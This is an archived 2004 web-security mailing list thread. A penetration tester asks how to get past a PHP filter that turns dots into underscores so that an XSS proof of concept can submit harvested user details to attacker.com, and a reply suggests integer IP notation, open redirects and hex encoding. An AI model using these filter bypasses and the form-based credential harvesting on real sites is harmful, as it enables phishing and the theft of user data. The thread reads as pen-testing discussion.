mailing list archives
RE: Fullstop Substitution in XSS
From: "Michael Silk" <michaels () phg com au>
Date: Tue, 1 Jun 2004 10:07:49 +1000
In the old days, an ip (127.0.0.1) used to be able to be replaced
for the expanded notation (127 * 2^24 + 0^16 + 0^8 + 1), perhaps
check if that still works (althought I seem to remember it doesn't).
Other than that (and possible dns infiltration) consider sites that,
upon invalid domain (http://yahoo?test () hello) redirect to somewhere
else ... even some search sites ... i.e. perhaps you could execute a
search which your malicious site (attacker.com) would make note of.
Or ... you say you tried hex encoding ... i.e. this ?
if result is:
<form target="INPUT GOES HERE">
INPUT GOES HERE could be ...
If the % get's translated at the time of sending to the site, hex-encode
that because the above is *exactly* what should appear in the source of
the form tag, not the decoded result.
From: Calum Power [mailto:enune () fribble net]
Sent: Saturday, 29 May 2004 2:49 PM
To: webappsec () securityfocus com
Subject: Fullstop Substitution in XSS
As a part of a recent Pen-Test, I came across an XSS vulnerabiity. The PHP
script that has this vuln is filtering fullstops (.) and replacing them
with underscores (_).
Now, I'm trying trying to write a Proof-of-Concept, in which a
(convincing) form would be outputted that could 'harvest' user details and
send them to an attacker's webserver.
My problem lies in the output of the form tags. Any: <form
target="http://attacker.com/path/to/script"> is of course being filtered
into: <form target="http://attacker_com/path/to/script">
Has anyone else had a similar problem? I've tried using hex and unicode
encoding, to no avail (they get decoded before the filtering, obviously).
Any help would be appreciated.
enune () fribble net
This email message and accompanying data may contain information that is confidential and/or subject to legal
privilege. If you are not the intended recipient, you are notified that any use, dissemination, distribution or copying
of this message or data is prohibited. If you have received this email message in error, please notify us immediately
and erase all copies of this message and attachments.
This email is for your convenience only, you should not rely on any information contained herein for contractual or
legal purposes. You should only rely on information and/or instructions in writing and on company letterhead signed by